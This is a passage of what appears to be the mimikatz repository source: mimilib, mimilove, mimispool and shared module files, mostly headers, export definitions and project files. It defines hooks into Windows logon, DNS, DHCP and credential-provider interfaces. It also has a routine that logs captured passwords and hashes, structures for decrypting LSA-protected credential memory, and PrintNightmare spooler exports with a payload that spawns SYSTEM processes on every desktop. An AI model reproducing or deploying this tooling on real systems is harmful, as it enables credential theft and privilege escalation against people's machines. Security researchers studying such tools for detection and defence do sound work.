17 | DnsPluginQuery = kdns_DnsPluginQuery
18 |
19 | DhcpServerCalloutEntry = kdhcp_DhcpServerCalloutEntry
20 | DhcpNewPktHook = kdhcp_DhcpNewPktHook
21 |
22 | Msv1_0SubAuthenticationRoutine = ksub_Msv1_0SubAuthenticationRoutine
23 | Msv1_0SubAuthenticationFilter = ksub_Msv1_0SubAuthenticationRoutine
24 |
25 | NPLogonNotify = knp_NPLogonNotify
26 | NPGetCaps = knp_NPGetCaps
27 |
28 | DllGetClassObject = kcredentialprovider_DllGetClassObject PRIVATE
29 | DllCanUnloadNow = kcredentialprovider_DllCanUnloadNow PRIVATE
--------------------------------------------------------------------------------
/mimilib/mimilib.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/mimilib/mimilib.rc
--------------------------------------------------------------------------------
/mimilib/mimilib.vcxproj.filters:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 | <ItemGroup>
4 | <None Include="mimilib.def" />
5 | </ItemGroup>
6 | <ItemGroup>
7 | <ResourceCompile Include="mimilib.rc" />
8 | </ItemGroup>
9 | <ItemGroup>
10 | <ClCompile Include="kappfree.c" />
11 | <ClCompile Include="utils.c" />
12 | <ClCompile Include="kssp.c" />
13 | <ClCompile Include="kfilt.c" />
14 | <ClCompile Include="sekurlsadbg\kuhl_m_sekurlsa_nt6.c">
15 | <Filter>sekurlsadbg</Filter>
16 | </ClCompile>
17 | <ClCompile Include="sekurlsadbg\kwindbg.c">
18 | <Filter>sekurlsadbg</Filter>
19 | </ClCompile>
20 | <ClCompile Include="sekurlsadbg\kuhl_m_sekurlsa_utils.c">
21 | <Filter>sekurlsadbg</Filter>
22 | </ClCompile>
23 | <ClCompile Include="sekurlsadbg\kuhl_m_sekurlsa_packages.c">
24 | <Filter>sekurlsadbg</Filter>
25 | </ClCompile>
26 | <ClCompile Include="sekurlsadbg\kull_m_rpc.c">
27 | <Filter>sekurlsadbg</Filter>
28 | </ClCompile>
29 | <ClCompile Include="sekurlsadbg\kull_m_rpc_ms-credentialkeys.c">
30 | <Filter>sekurlsadbg</Filter>
31 | </ClCompile>
32 | <ClCompile Include="kdns.c" />
33 | <ClCompile Include="kdhcp.c" />
34 | <ClCompile Include="ksub.c" />
35 | <ClCompile Include="knp.c" />
36 | <ClCompile Include="kcredentialprovider.c" />
37 | </ItemGroup>
38 | <ItemGroup>
39 | <ClInclude Include="utils.h" />
40 | <ClInclude Include="kcredentialprovider.h" />
41 | <ClInclude Include="kssp.h" />
42 | <ClInclude Include="kfilt.h" />
43 | <ClInclude Include="sekurlsadbg\kuhl_m_sekurlsa_nt6.h">
44 | <Filter>sekurlsadbg</Filter>
45 | </ClInclude>
46 | <ClInclude Include="sekurlsadbg\kwindbg.h">
47 | <Filter>sekurlsadbg</Filter>
48 | </ClInclude>
49 | <ClInclude Include="sekurlsadbg\kuhl_m_sekurlsa_utils.h">
50 | <Filter>sekurlsadbg</Filter>
51 | </ClInclude>
52 | <ClInclude Include="sekurlsadbg\kuhl_m_sekurlsa_packages.h">
53 | <Filter>sekurlsadbg</Filter>
54 | </ClInclude>
55 | <ClInclude Include="sekurlsadbg\kull_m_rpc.h">
56 | <Filter>sekurlsadbg</Filter>
57 | </ClInclude>
58 | <ClInclude Include="sekurlsadbg\kull_m_rpc_ms-credentialkeys.h">
59 | <Filter>sekurlsadbg</Filter>
60 | </ClInclude>
61 | <ClInclude Include="kdns.h" />
62 | <ClInclude Include="kdhcp.h" />
63 | <ClInclude Include="ksub.h" />
64 | <ClInclude Include="knp.h" />
65 | </ItemGroup>
66 | <ItemGroup>
67 | <Filter Include="sekurlsadbg">
68 | <UniqueIdentifier>{017caad8-223d-4869-b733-2fadef6ebc49}</UniqueIdentifier>
69 | </Filter>
70 | </ItemGroup>
71 | </Project>
--------------------------------------------------------------------------------
/mimilib/sekurlsadbg/kuhl_m_sekurlsa_nt6.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kwindbg.h"
8 | #include <bcrypt.h>
9 |
10 | typedef struct _KIWI_HARD_KEY {
11 | ULONG cbSecret;
12 | BYTE data[ANYSIZE_ARRAY]; // etc...
13 | } KIWI_HARD_KEY, *PKIWI_HARD_KEY;
14 |
15 | typedef struct _KIWI_BCRYPT_KEY {
16 | ULONG size;
17 | ULONG tag; // 'MSSK'
18 | ULONG type;
19 | ULONG unk0;
20 | ULONG unk1;
21 | ULONG unk2;
22 | KIWI_HARD_KEY hardkey;
23 | } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
24 |
25 | typedef struct _KIWI_BCRYPT_KEY8 {
26 | ULONG size;
27 | ULONG tag; // 'MSSK'
28 | ULONG type;
29 | ULONG unk0;
30 | ULONG unk1;
31 | ULONG unk2;
32 | ULONG unk3;
33 | PVOID unk4; // before, align in x64
34 | KIWI_HARD_KEY hardkey;
35 | } KIWI_BCRYPT_KEY8, *PKIWI_BCRYPT_KEY8;
36 |
37 | typedef struct _KIWI_BCRYPT_KEY81 {
38 | ULONG size;
39 | ULONG tag; // 'MSSK'
40 | ULONG type;
41 | ULONG unk0;
42 | ULONG unk1;
43 | ULONG unk2;
44 | ULONG unk3;
45 | ULONG unk4;
46 | PVOID unk5; // before, align in x64
47 | ULONG unk6;
48 | ULONG unk7;
49 | ULONG unk8;
50 | ULONG unk9;
51 | KIWI_HARD_KEY hardkey;
52 | } KIWI_BCRYPT_KEY81, *PKIWI_BCRYPT_KEY81;
53 |
54 | typedef struct _KIWI_BCRYPT_HANDLE_KEY {
55 | ULONG size;
56 | ULONG tag; // 'UUUR'
57 | PVOID hAlgorithm;
58 | PKIWI_BCRYPT_KEY key;
59 | PVOID unk0;
60 | } KIWI_BCRYPT_HANDLE_KEY, *PKIWI_BCRYPT_HANDLE_KEY;
61 |
62 | typedef struct _KIWI_BCRYPT_GEN_KEY {
63 | BCRYPT_ALG_HANDLE hProvider;
64 | BCRYPT_KEY_HANDLE hKey;
65 | PBYTE pKey;
66 | ULONG cbKey;
67 | } KIWI_BCRYPT_GEN_KEY, *PKIWI_BCRYPT_GEN_KEY;
68 |
69 | NTSTATUS kuhl_m_sekurlsa_nt6_init();
70 | NTSTATUS kuhl_m_sekurlsa_nt6_clean();
71 |
72 | NTSTATUS kuhl_m_sekurlsa_nt6_LsaInitializeProtectedMemory();
73 | VOID kuhl_m_sekurlsa_nt6_LsaCleanupProtectedMemory();
74 | VOID WINAPI kuhl_m_sekurlsa_nt6_LsaUnprotectMemory (IN PVOID Buffer, IN ULONG BufferSize);
75 |
76 | NTSTATUS kuhl_m_sekurlsa_nt6_acquireKeys(ULONG_PTR pInitializationVector, ULONG_PTR phAesKey, ULONG_PTR ph3DesKey);
77 | BOOL kuhl_m_sekurlsa_nt6_acquireKey(ULONG_PTR phKey, PKIWI_BCRYPT_GEN_KEY pGenKey);
--------------------------------------------------------------------------------
/mimilib/sekurlsadbg/kull_m_rpc.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kull_m_rpc.h"
7 |
8 | void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes)
9 | {
10 | return LocalAlloc(LPTR, cBytes);
11 | }
12 |
13 | void __RPC_USER midl_user_free(void __RPC_FAR * p)
14 | {
15 | LocalFree(p);
16 | }
17 |
18 | void __RPC_USER ReadFcn(void *State, char **pBuffer, unsigned int *pSize)
19 | {
20 | *pBuffer = (char *) ((PKULL_M_RPC_FCNSTRUCT) State)->addr;
21 | ((PKULL_M_RPC_FCNSTRUCT) State)->addr = *pBuffer + *pSize;
22 | ((PKULL_M_RPC_FCNSTRUCT) State)->size -= *pSize;
23 | }
24 |
25 | BOOL kull_m_rpc_Generic_Decode(PVOID data, DWORD size, PVOID pObject, PGENERIC_RPC_DECODE fDecode)
26 | {
27 | BOOL status = FALSE;
28 | RPC_STATUS rpcStatus;
29 | PVOID buffer;
30 | KULL_M_RPC_FCNSTRUCT UserState;
31 | handle_t pHandle;
32 |
33 | if(buffer = UserState.addr = LocalAlloc(LPTR, size))
34 | {
35 | UserState.size = size;
36 | RtlCopyMemory(UserState.addr, data, size); // avoid data alteration
37 | rpcStatus = MesDecodeIncrementalHandleCreate(&UserState, ReadFcn, &pHandle);
38 | if(NT_SUCCESS(rpcStatus))
39 | {
40 | rpcStatus = MesIncrementalHandleReset(pHandle, NULL, NULL, NULL, NULL, MES_DECODE);
41 | if(NT_SUCCESS(rpcStatus))
42 | {
43 | RpcTryExcept
44 | {
45 | fDecode(pHandle, pObject);
46 | status = TRUE;
47 | }
48 | RpcExcept(EXCEPTION_EXECUTE_HANDLER)
49 | dprintf("[ERROR] [RPC Decode] Exception 0x%08x: (%u)\n", RpcExceptionCode(), RpcExceptionCode());
50 | RpcEndExcept
51 | }
52 | else dprintf("[ERROR] [RPC Decode] MesIncrementalHandleReset: %08x\n", rpcStatus);
53 | MesHandleFree(pHandle);
54 | }
55 | else dprintf("[ERROR] [RPC Decode] MesDecodeIncrementalHandleCreate: %08x\n", rpcStatus);
56 | LocalFree(buffer);
57 | }
58 | return status;
59 | }
60 |
61 | void kull_m_rpc_Generic_Free(PVOID pObject, PGENERIC_RPC_FREE fFree)
62 | {
63 | RPC_STATUS rpcStatus;
64 | KULL_M_RPC_FCNSTRUCT UserState = {NULL, 0};
65 | handle_t pHandle;
66 |
67 | rpcStatus = MesDecodeIncrementalHandleCreate(&UserState, ReadFcn, &pHandle); // for legacy
68 | if(NT_SUCCESS(rpcStatus))
69 | {
70 | RpcTryExcept
71 | fFree(pHandle, pObject);
72 | RpcExcept(EXCEPTION_EXECUTE_HANDLER)
73 | dprintf("[ERROR] [RPC Free] Exception 0x%08x: (%u)\n", RpcExceptionCode(), RpcExceptionCode());
74 | RpcEndExcept
75 | MesHandleFree(pHandle);
76 | }
77 | else dprintf("[ERROR] [RPC Free] MesDecodeIncrementalHandleCreate: %08x\n", rpcStatus);
78 | }
--------------------------------------------------------------------------------
/mimilib/sekurlsadbg/kull_m_rpc.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m_sekurlsa_utils.h"
8 | #ifndef __REQUIRED_RPCNDR_H_VERSION__
9 | #define __REQUIRED_RPCNDR_H_VERSION__ 475
10 | #endif
11 |
12 | #include <rpc.h>
13 | #include <rpcndr.h>
14 |
15 | #ifndef __RPCNDR_H_VERSION__
16 | #error this stub requires an updated version of <rpcndr.h>
17 | #endif // __RPCNDR_H_VERSION__
18 |
19 | #include "midles.h"
20 | #include <string.h>
21 |
22 | typedef DWORD NET_API_STATUS;
23 | typedef UNICODE_STRING RPC_UNICODE_STRING;
24 |
25 | typedef struct _KULL_M_RPC_FCNSTRUCT {
26 | PVOID addr;
27 | size_t size;
28 | } KULL_M_RPC_FCNSTRUCT, *PKULL_M_RPC_FCNSTRUCT;
29 |
30 | void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes);
31 | void __RPC_USER midl_user_free(void __RPC_FAR * p);
32 | void __RPC_USER ReadFcn(void *State, char **pBuffer, unsigned int *pSize);
33 |
34 | typedef void (* PGENERIC_RPC_DECODE) (IN handle_t pHandle, IN PVOID pObject);
35 | typedef void (* PGENERIC_RPC_FREE) (IN handle_t pHandle, IN PVOID pObject);
36 |
37 | BOOL kull_m_rpc_Generic_Decode(PVOID data, DWORD size, PVOID pObject, PGENERIC_RPC_DECODE fDecode);
38 | void kull_m_rpc_Generic_Free(PVOID data, PGENERIC_RPC_FREE fFree);
--------------------------------------------------------------------------------
/mimilib/sekurlsadbg/kull_m_rpc_ms-credentialkeys.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "kull_m_rpc.h"
3 |
4 | typedef enum _KIWI_CREDENTIAL_KEY_TYPE {
5 | CREDENTIALS_KEY_TYPE_NTLM = 1,
6 | CREDENTIALS_KEY_TYPE_SHA1 = 2,
7 | CREDENTIALS_KEY_TYPE_ROOTKEY = 3,
8 | CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION = 4,
9 | } KIWI_CREDENTIAL_KEY_TYPE;
10 |
11 | typedef struct _KIWI_CREDENTIAL_KEY {
12 | DWORD unkEnum; // version ?
13 | KIWI_CREDENTIAL_KEY_TYPE type;
14 | WORD iterations;
15 | WORD cbData;
16 | BYTE *pbData;
17 | } KIWI_CREDENTIAL_KEY, *PKIWI_CREDENTIAL_KEY;
18 |
19 | typedef struct _KIWI_CREDENTIAL_KEYS {
20 | DWORD count;
21 | KIWI_CREDENTIAL_KEY keys[ANYSIZE_ARRAY];
22 | } KIWI_CREDENTIAL_KEYS, *PKIWI_CREDENTIAL_KEYS;
23 |
24 | void CredentialKeys_Decode(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS * _pType);
25 | void CredentialKeys_Free(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS * _pType);
26 |
27 | #define kull_m_rpc_DecodeCredentialKeys(/*PVOID */data, /*DWORD */size, /*PKIWI_CREDENTIAL_KEYS **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) CredentialKeys_Decode)
28 | #define kull_m_rpc_FreeCredentialKeys(/*PKIWI_CREDENTIAL_KEYS **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) CredentialKeys_Free)
--------------------------------------------------------------------------------
/mimilib/utils.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "utils.h"
7 |
8 | void klog(FILE * logfile, PCWCHAR format, ...)
9 | {
10 | if(logfile)
11 | {
12 | va_list args;
13 | va_start(args, format);
14 | vfwprintf(logfile, format, args);
15 | va_end(args);
16 | fflush(logfile);
17 | }
18 | }
19 |
20 | void klog_password(FILE * logfile, PUNICODE_STRING pPassword)
21 | {
22 | int i = IS_TEXT_UNICODE_ODD_LENGTH | IS_TEXT_UNICODE_STATISTICS;
23 | if(pPassword->Buffer)
24 | {
25 | if(IsTextUnicode(pPassword->Buffer, pPassword->Length, &i))
26 | klog(logfile, L"%wZ", pPassword);
27 | else klog_hash(logfile, pPassword, TRUE);
28 | //for(i = 0; i < pPassword->Length; i++)
29 | // klog(logfile, L"%02x ", ((LPCBYTE) pPassword->Buffer)[i]);
30 | }
31 | }
32 |
33 | void klog_hash(FILE * logfile, PUNICODE_STRING pHash, BOOLEAN withSpace)
34 | {
35 | USHORT i;
36 | if(pHash->Buffer)
37 | for(i = 0; i < pHash->Length; i++)
38 | klog(logfile, L"%02x%s", ((LPCBYTE) pHash->Buffer)[i], withSpace ? " " : "");
39 | }
40 |
41 | void klog_sid(FILE * logfile, PSID pSid)
42 | {
43 | LPWSTR stringSid;
44 | if(pSid && ConvertSidToStringSid(pSid, &stringSid))
45 | {
46 | klog(logfile, L"%s", stringSid);
47 | LocalFree(stringSid);
48 | }
49 | }
--------------------------------------------------------------------------------
/mimilib/utils.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include <ntstatus.h>
8 | #define WIN32_NO_STATUS
9 | #define SECURITY_WIN32
10 | #define CINTERFACE
11 | #define COBJMACROS
12 | #include <windows.h>
13 | #include <ntsecapi.h>
14 | #include <sspi.h>
15 | #include <sddl.h>
16 | #include <wincred.h>
17 | #include <ntsecapi.h>
18 | #include <ntsecpkg.h>
19 | #include <stdio.h>
20 |
21 | #if defined(_M_ARM64)
22 | #define MIMIKATZ_ARCH_A "arm64"
23 | #elif defined(_M_X64)
24 | #define MIMIKATZ_ARCH_A "x64"
25 | #elif defined(_M_IX86)
26 | #define MIMIKATZ_ARCH_A "x86"
27 | #endif
28 |
29 | #define MIMIKATZ_A "mimikatz"
30 | #define MIMIKATZ_VERSION_A "2.2.0"
31 | #define MIMIKATZ_CODENAME_A "A La Vie, A L\'Amour"
32 | #define MIMIKATZ_FULL_A MIMIKATZ_A " " MIMIKATZ_VERSION_A " (" MIMIKATZ_ARCH_A ") built on " __DATE__ " " __TIME__
33 | #define MIMIKATZ_SECOND_A "\"" MIMIKATZ_CODENAME_A "\""
34 |
35 | #if !defined(NT_SUCCESS)
36 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
37 | #endif
38 |
39 | #define LM_NTLM_HASH_LENGTH 16
40 |
41 | void klog(FILE * logfile, PCWCHAR format, ...);
42 | void klog_password(FILE * logfile, PUNICODE_STRING pPassword);
43 | void klog_hash(FILE * logfile, PUNICODE_STRING pHash, BOOLEAN withSpace);
44 | void klog_sid(FILE * logfile, PSID pSid);
45 |
46 | typedef struct _REMOTE_LIB_FUNC {
47 | DWORD outputSize;
48 | PVOID outputData;
49 | DWORD inputSize;
50 | BYTE inputData[ANYSIZE_ARRAY];
51 | } REMOTE_LIB_FUNC, *PREMOTE_LIB_FUNC;
--------------------------------------------------------------------------------
/mimilove/mimilove.rc:
--------------------------------------------------------------------------------
1 | #include <winres.h>
2 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
3 |
4 | VS_VERSION_INFO VERSIONINFO
5 |
6 | FILEVERSION 1,0,0,0
7 | PRODUCTVERSION 1,0,0,0
8 | FILEFLAGS VS_FF_PRERELEASE|VS_FF_SPECIALBUILD|VS_FF_PRIVATEBUILD
9 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK
10 | FILEOS VOS_NT
11 | FILETYPE VFT_APP
12 | //FILESUBTYPE 0x0L
13 | BEGIN
14 | BLOCK "StringFileInfo"
15 | BEGIN
16 | BLOCK "040904b0"
17 | BEGIN
18 | VALUE "ProductName", "mimilove"
19 | VALUE "ProductVersion", "1.0.0.0"
20 | VALUE "CompanyName", "gentilkiwi (Benjamin DELPY)"
21 | VALUE "FileDescription", "mimilove for Windows 2000"
22 | VALUE "FileVersion", "1.0.0.0"
23 | VALUE "InternalName", "mimilove"
24 | VALUE "LegalCopyright", "Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)"
25 | VALUE "OriginalFilename", "mimilove.exe"
26 | VALUE "PrivateBuild", "Build with love for POC only"
27 | VALUE "SpecialBuild", ":)"
28 | END
29 | END
30 | BLOCK "VarFileInfo"
31 | BEGIN
32 | VALUE "Translation", 0x0409, 1200
33 | END
34 | END
--------------------------------------------------------------------------------
/mimilove/mimilove.vcxproj.filters:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 | <ItemGroup>
4 | <ClCompile Include="mimilove.c" />
5 | <ClCompile Include="..\modules\kull_m_output.c">
6 | <Filter>common modules</Filter>
7 | </ClCompile>
8 | <ClCompile Include="..\modules\kull_m_process.c">
9 | <Filter>common modules</Filter>
10 | </ClCompile>
11 | <ClCompile Include="..\modules\kull_m_memory.c">
12 | <Filter>common modules</Filter>
13 | </ClCompile>
14 | <ClCompile Include="..\modules\kull_m_string.c">
15 | <Filter>common modules</Filter>
16 | </ClCompile>
17 | <ClCompile Include="..\modules\kull_m_minidump.c">
18 | <Filter>common modules</Filter>
19 | </ClCompile>
20 | <ClCompile Include="..\modules\kull_m_kernel.c">
21 | <Filter>common modules</Filter>
22 | </ClCompile>
23 | </ItemGroup>
24 | <ItemGroup>
25 | <ClInclude Include="mimilove.h" />
26 | <ClInclude Include="..\modules\kull_m_output.h">
27 | <Filter>common modules</Filter>
28 | </ClInclude>
29 | <ClInclude Include="..\modules\kull_m_process.h">
30 | <Filter>common modules</Filter>
31 | </ClInclude>
32 | <ClInclude Include="..\modules\kull_m_memory.h">
33 | <Filter>common modules</Filter>
34 | </ClInclude>
35 | <ClInclude Include="..\modules\kull_m_string.h">
36 | <Filter>common modules</Filter>
37 | </ClInclude>
38 | <ClInclude Include="..\modules\kull_m_minidump.h">
39 | <Filter>common modules</Filter>
40 | </ClInclude>
41 | <ClInclude Include="..\modules\kull_m_kernel.h">
42 | <Filter>common modules</Filter>
43 | </ClInclude>
44 | </ItemGroup>
45 | <ItemGroup>
46 | <Filter Include="common modules">
47 | <UniqueIdentifier>{7cb872e7-a52b-4394-a979-fd7a0a89d729}</UniqueIdentifier>
48 | </Filter>
49 | </ItemGroup>
50 | <ItemGroup>
51 | <ResourceCompile Include="mimilove.rc" />
52 | </ItemGroup>
53 | </Project>
--------------------------------------------------------------------------------
/mimispool/mimispool.def:
--------------------------------------------------------------------------------
1 | LIBRARY
2 | EXPORTS
3 | ; PrintNightMare 2.x - via config file and/or "real driver"
4 | DrvResetConfigCache
5 | DrvQueryDriverInfo
6 | DrvEnableDriver
7 | DrvDisableDriver
8 |
9 | ; PrintNightMare 4.x - via CopyFiles
10 | GenerateCopyFilePaths
11 | SpoolerCopyFileEvent
--------------------------------------------------------------------------------
/mimispool/mimispool.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include <windows.h>
8 | #include <userenv.h>
9 |
10 | //__pragma(comment(linker, "/export:DllCanUnloadNow=KyXPUI_orig.DllCanUnloadNow,PRIVATE"))
11 | //__pragma(comment(linker, "/export:DllGetClassObject=KyXPUI_orig.DllGetClassObject,PRIVATE"))
12 |
13 | #define LOGONID_CURRENT ((ULONG) -1)
14 | #define SERVERHANDLE_CURRENT ((HANDLE) NULL)
15 | #define MAX_THINWIRECACHE 4
16 | #define WINSTATIONNAME_LENGTH 32
17 | #define DOMAIN_LENGTH 17
18 | #define USERNAME_LENGTH 20
19 | typedef WCHAR WINSTATIONNAME[WINSTATIONNAME_LENGTH + 1];
20 |
21 | typedef enum _WINSTATIONSTATECLASS {
22 | State_Active = 0,
23 | State_Connected = 1,
24 | State_ConnectQuery = 2,
25 | State_Shadow = 3,
26 | State_Disconnected = 4,
27 | State_Idle = 5,
28 | State_Listen = 6,
29 | State_Reset = 7,
30 | State_Down = 8,
31 | State_Init = 9
32 | } WINSTATIONSTATECLASS;
33 |
34 | #pragma warning(push)
35 | #pragma warning(disable:4201)
36 | typedef struct _SESSIONIDW {
37 | union {
38 | ULONG SessionId;
39 | ULONG LogonId;
40 | } DUMMYUNIONNAME;
41 | WINSTATIONNAME WinStationName;
42 | WINSTATIONSTATECLASS State;
43 | } SESSIONIDW, * PSESSIONIDW;
44 | #pragma warning(pop)
45 |
46 | BOOLEAN WINAPI WinStationEnumerateW(IN HANDLE hServer, OUT PSESSIONIDW* SessionIds, OUT PULONG Count);
47 | BOOLEAN WINAPI WinStationFreeMemory(IN PVOID Buffer);
48 |
49 | typedef LONG_PTR(APIENTRY* PFN)();
50 |
51 | typedef struct _DRVFN {
52 | ULONG iFunc;
53 | PFN pfn;
54 | } DRVFN, * PDRVFN;
55 |
56 | typedef struct tagDRVENABLEDATA {
57 | ULONG iDriverVersion;
58 | ULONG c;
59 | DRVFN* pdrvfn;
60 | } DRVENABLEDATA, * PDRVENABLEDATA;
61 |
62 | #define DRVQUERY_USERMODE 1
63 |
64 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved);
65 |
66 | // PrintNightMare 2.x - via config file and/or "real driver"
67 | VOID APIENTRY DrvResetConfigCache();
68 | BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded);
69 | BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);
70 | VOID APIENTRY DrvDisableDriver();
71 |
72 | // PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
73 |
74 | // PrintNightMare 4.x - via CopyFiles
75 | DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
76 | BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
77 |
78 | // Kiwi payload - SYSTEM on all active desktop(s)
79 | BOOL RunProcessForAll(LPWSTR szProcess);
--------------------------------------------------------------------------------
/mimispool/mimispool.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/mimispool/mimispool.rc
--------------------------------------------------------------------------------
/mimispool/mimispool.vcxproj.filters:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 | <ItemGroup>
4 | <ClCompile Include="mimispool.c" />
5 | </ItemGroup>
6 | <ItemGroup>
7 | <ClInclude Include="mimispool.h" />
8 | </ItemGroup>
9 | <ItemGroup>
10 | <ResourceCompile Include="mimispool.rc" />
11 | </ItemGroup>
12 | <ItemGroup>
13 | <None Include="mimispool.def" />
14 | <None Include="README.md" />
15 | </ItemGroup>
16 | </Project>
--------------------------------------------------------------------------------
/modules/kull_m_acr.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kull_m_string.h"
9 |
10 | #define IOCTL_CCID_ESCAPE SCARD_CTL_CODE(3500)
11 |
12 | #define ACR_MAX_LEN 255
13 |
14 | typedef struct _KULL_M_ACR_COMM {
15 | //SCARDCONTEXT hContext;
16 | SCARDHANDLE hCard;
17 | BOOL withoutCard;
18 | LPVOID suppdata;
19 | BOOL descr;
20 | } KULL_M_ACR_COMM, *PKULL_M_ACR_COMM;
21 |
22 | BOOL kull_m_acr_init(SCARDCONTEXT hContext, LPCWSTR szReaderName, BOOL withoutCard, LPVOID suppdata, BOOL descr, PKULL_M_ACR_COMM comm);
23 | void kull_m_acr_finish(PKULL_M_ACR_COMM comm);
24 | BOOL kull_m_arc_sendrecv(PKULL_M_ACR_COMM comm, const BYTE *pbData, const UINT16 cbData, BYTE *pbResult, UINT16 *cbResult);
25 | BOOL kull_m_acr_sendrecv_ins(PKULL_M_ACR_COMM comm, BYTE cla, BYTE ins, BYTE p1, BYTE p2, const BYTE *pbData, const UINT16 cbData, BYTE *pbResult, UINT16 *cbResult, BOOL noLe);
26 | BOOL CALLBACK kull_m_arcr_SendRecvDirect(const BYTE *pbData, const UINT16 cbData, BYTE *pbResult, UINT16 *cbResult, LPVOID suppdata);
--------------------------------------------------------------------------------
/modules/kull_m_asn1.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include <Winldap.h>
9 | #include <Winber.h>
10 | #include <msasn1.h>
11 | #include "kull_m_string.h"
12 |
13 | #define DIRTY_ASN1_ID_BOOLEAN 0x01
14 | #define DIRTY_ASN1_ID_INTEGER 0x02
15 | #define DIRTY_ASN1_ID_BIT_STRING 0x03
16 | #define DIRTY_ASN1_ID_OCTET_STRING 0x04
17 | #define DIRTY_ASN1_ID_NULL 0x05
18 | #define DIRTY_ASN1_ID_OBJECT_IDENTIFIER 0x06
19 | #define DIRTY_ASN1_ID_GENERAL_STRING 0x1b
20 | #define DIRTY_ASN1_ID_GENERALIZED_TIME 0x18
21 | #define DIRTY_ASN1_ID_SEQUENCE 0x30
22 |
23 | #define DIRTY_ASN1_MASK_APPLICATION 0x60
24 | #define DIRTY_ASN1_MASK_CONTEXT 0xa0
25 |
26 | #define MAKE_APP_TAG(AppId) ((ber_tag_t) (DIRTY_ASN1_MASK_APPLICATION | AppId))
27 | #define MAKE_CTX_TAG(CtxId) ((ber_tag_t) (DIRTY_ASN1_MASK_CONTEXT | CtxId))
28 |
29 | void kull_m_asn1_BitStringFromULONG(BerElement * pBer, ULONG data);
30 | void kull_m_asn1_GenTime(BerElement * pBer, PFILETIME localtime);
31 | void kull_m_asn1_GenString(BerElement * pBer, PCUNICODE_STRING String);
32 |
33 | typedef struct {
34 | unsigned short length;
35 | unsigned char *value;
36 | } OssEncodedOID;
37 |
38 | extern ASN1_PUBLIC BOOL ASN1API ASN1BERDotVal2Eoid(__in ASN1encoding_t pEncoderInfo, __in const ASN1char_t *dotOID, __out OssEncodedOID *encodedOID);
39 | extern ASN1_PUBLIC BOOL ASN1API ASN1BEREoid2DotVal(__in ASN1decoding_t pDecoderInfo, __in const OssEncodedOID *encodedOID, __out ASN1char_t **dotOID);
40 |
